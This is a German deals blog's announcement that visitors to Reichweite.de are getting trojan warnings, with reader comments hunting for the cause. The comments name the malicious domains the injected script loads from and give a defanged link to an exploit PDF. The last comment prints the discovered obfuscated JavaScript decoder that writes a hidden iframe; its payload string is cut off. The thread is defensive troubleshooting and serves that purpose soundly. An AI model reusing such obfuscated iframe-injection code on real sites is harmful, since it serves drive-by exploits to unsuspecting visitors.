Die besten Schnäppchen im Schnäppchenticker seit 2006 
Facebook Twitter Gplus E-mail RSS
Blitzangebote: Amazon DE | UK | FR - Warehouse Deals: DE | UK | FR

Virus auf Reichweite.de

Seit heute Morgen melden Virenscanner einen Trojaner bei Aufruf von Reichweite.de. Der vermeintliche Trojaner („Exploit-IFrame.gen.c“ bzw. „Troj/PDFJs-A“) wird vom Browser nur im Cache-Verzeichnis abgelegt und dort nicht ausgeführt, kann also keinen Schaden anrichten. Die Datei kann natürlich gefahrlos gelöscht werden.

Wir versuchen trotzdem schnellstmöglich herauszufinden, welche Datei die Warnung verursacht um die nervigen Virus-Warnungen zu vermeiden. Bei der großen Anzahl von Dateien wird das leider zur Suche nach der berühmten „Nadel im Heuhaufen“.


Die letzten Einträge in der Kategorie Ankündigung

12 Antworten

  1. Felix

    Keine Ahnung ob es etwas hilft, aber seit heute kommt bei mir auf reichweite.de auch die Meldung das Acrobat nicht geöffnet werden konnte.
    Scheint eventuell ein PDF zu sein.

  2. Ich würde erst mal die ganzen AD-Partner rausschmeißen und dann schauen, ob es dann noch ist. Wenn nicht, dann sikzessive wieder hinzunehmen, bis der Übeltäter gefunden ist.

    • holger

      Persönlich betrifft mich das Problem dank NoScript im Firefox zwar nicht, aber das liefert vielleicht einen Hinweis: Ich erlaube Javascript für diese Seite nur von reichweite.de. Das reicht schon aus, damit für filarmon.info eine Erlaubnis angefordert wird. Wenn ich die erteile, folgen theriotbefore.com und schliesslich gvatemal.biz. Ich hab keine Zeit, mir das näher anzusehen, vermute aber irgendwas im packed javascript von WordPress (cforms, jquery, polls, useronline)

  3. Faster

    bei mir kommt auch irgendwas a la „HTML/Crypted.Gen“ – scheint ne pdf-datei zu sein da auf pdf.pdf verwiesen wird…

  4. Stefan

    bei mir wurde firefox beendet als ich meinen täglichen besuch bei euch heute machte , danach ging mit firefox und MS Iexplorer nix mehr auch mein Fox!Box Addon für Firefox meldete ständig fehlermeldungen , bis ich merkte das ein Proxy gesetzt wurde , also der Virus setzt wohl nen Proxy für Firefox und auch Internet Explorer , nach dem ich die rausgenommen hatte ging wieder alles, vielleicht hilfts ja

  5. ojhunter

    naja wenigstens weiss ich jetzt wo der herkommt – bei all den tabs war ich mir net sicher welche website es war 😛

    Event: Security Risk Found!
    Risk: Bloodhound.Exploit.213
    File: C:\Program Files\Opera\profile\cache4\opr2PLUZ
    Location: Unknown Storage

  6. @holger: Danke für die Tipps, noscript habe ich gerade installiert. Das pdf wird von gvatemal.biz geladen. Evtl. könnte das doch gefährlich sein, da der Acrobat Reader gestartet wird. Die WP-eigenen Skripte liegen auf dem eigenen Server, ich vermute eher von außen angezogene Skripte.

    • holger

      Bliebe nur noch herauszufinden, wer oder was versucht, js von filarmon.info einzubinden. Entweder hat jemand der WordPress-Installation ein modifiziertes .js untergejubelt (die mutmasslichen Kandidaten hatte ich ja schon erwähnt) oder diese binden Krams aus der Datenbank ein. Dann sollte man deren Dump vielleicht mal auf Auffälligkeiten untersuchen.

    • holger

      Hmm. Du editierst Deine Beiträge nach dem Posten 😉

      Externe Skripte kann ich ausschliessen. Die erlaubt mein NoScript gar nicht erst. Das ist schon Dein eigenes Problem.

      http://mechanicalrobotfish.com/posts/122-javascript-packing-unpacking-and-beautifying

      • Hi Holger, nochmal danke für die Tipps. Da hatte ich Dich anfangs falsch verstanden, u.a. weil ich davon ausging, dass die WP-Skripte NICHT der Übeltäter sind (oder sein können, auf dem Server wurde nichts geändert). Außerdem müsste es in dem Fall ja auch eine richtige Welle von Blogs mit dem gleichen Problem geben. Die externen Skripte habe ich alle mal aus- und wieder eingebunden, ohne den Täter zu finden.

  7. Wolf

    Erst als ich die Scripte für gvatemal.biz zuließ, kam die Virenmeldung mit der Warnung vor nem trojanischen Pferd in:

    h**p://gvatemal.biz/pfd/spl/pdf.pdf

    JS:Packed-L [Trj]

    Scripte allein für reichweite.de erlaubt erzeugt keine Warnmeldung.

  8. Habe die Stelle gefunden, aber noch nicht entfernen können…

    "search_bot111"
    function Decode(){var temp="",i,c=0,out=""; var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!...";l=str.length;while(c< =str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);}Decode();

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.

Home Ankündigung Virus auf Reichweite.de